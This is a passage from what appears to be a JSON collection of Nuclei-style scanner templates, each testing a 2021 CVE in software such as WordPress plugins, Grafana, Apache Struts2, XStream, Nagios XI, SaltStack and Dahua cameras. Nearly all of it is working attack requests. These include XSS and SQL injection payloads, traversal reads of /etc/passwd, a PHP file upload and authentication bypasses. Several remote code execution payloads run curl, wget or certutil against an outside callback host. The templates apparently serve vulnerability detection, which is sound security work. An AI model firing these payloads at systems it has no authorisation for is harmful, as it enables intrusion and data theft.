Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?m)^-----BEGIN PRIVATE KEY-----"]},{"type":"word","part":"header","words":["application/json","application/html"],"condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-26294","info":{"name":"AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<AdminLogin>","<AdminPassword>","<DBHost>"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["User-Agent: (curl|CertUtil)"]}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(header,'text/plain')","regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(header,'text/plain')","contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46107","info":{"name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')","contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","internal":true,"words":["IBM WebSphere Portal"]}]},{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]}]}]},{"id":"CVE-2021-24956","info":{"name":"Blog2Social < 6.8.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"><script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" name=","Your Activity"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/car-repair-services/css","/wp-content/themes/car-repair-services/js","id=\"car-repair-services-"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey <1.5.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true","id","params","session"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site 